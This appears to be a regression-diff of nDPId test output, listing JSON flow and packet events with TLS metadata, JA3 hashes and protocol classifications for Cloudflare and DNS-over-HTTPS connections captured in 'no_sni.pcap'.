-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447227,"flow_last_seen":1604822447227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447227,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1604822447227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447227,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcmzAbtjbUROAAAAALAC\/\/+t4gAAAgQFtAEDAwYBAQgKKlL7RgAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447249,"flow_last_seen":1604822447249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447249,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1604822447249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447249,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcm0AbsYxEgFAAAAALAC\/\/\/0wAAAAgQFtAEDAwYBAQgKKlL7WQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm1AbvwpFrxAAAAALAC\/\/+HSQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm2AbtLPosXAAAAALAC\/\/\/8iAAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm3AbsAL2HpAAAAALAC\/\/9wxQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1604822447311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447311,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybNKGfaqY21ET4AS\/\/\/K9AAAAgQFeAEBBAIBAwMK"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1604822447311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447311,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcmzAbtjbURPShn2q1AQEAD7jQAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1604822447325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447325,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybQgqbhsGMRIBoAS\/\/95lAAAAgQFeAEBBAIBAwMK"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1604822447325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447325,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcm0AbsYxEgGIKm4bVAQEACqLQAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1604822447368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447368,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybVDiAdt8KRa8oAS\/\/+aXQAAAgQFeAEBBAIBAwMK"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1604822447369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447369,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm1AbvwpFryQ4gHblAQEADK9gAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1604822447370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447370,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybbraGnySz6LGIAS\/\/8FNwAAAgQFeAEBBAIBAwMK"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1604822447370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447370,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm2AbtLPosY62hp81AQEAA10AAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1604822447373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447373,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybcBQwC0AC9h6oAS\/\/\/M1wAAAgQFeAEBBAIBAwMK"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1604822447373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447373,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm3AbsAL2HqAUMAtVAQEAD9cAAA"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 